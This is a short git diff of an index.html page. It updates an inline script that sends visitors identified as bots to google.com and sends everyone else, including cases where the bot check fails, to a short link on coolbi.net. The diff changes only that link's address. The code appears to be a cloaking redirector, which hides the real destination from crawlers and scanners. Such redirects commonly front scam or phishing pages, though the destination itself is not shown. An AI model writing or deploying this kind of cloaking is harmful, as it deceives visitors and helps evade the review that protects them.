--- a/index.html
+++ b/index.html
@@ -80,15 +80,16 @@
         if (data.bot === true) {
           window.location.href = "https://google.com";
         } else {
-          window.location.href = "https://dash.coolbi.net/r/Dd23g7A";
+          window.location.href = "https://auto.coolbi.net/r/7ySNeC";
         }
       } catch (err) {
         // fallback jika API error
         console.error("API error:", err);
-        window.location.href = "https://dash.coolbi.net/r/Dd23g7A";
+        window.location.href = "https://auto.coolbi.net/r/7ySNeC";
       }
     })();
   </script>
 </body>
 
 </html>
+
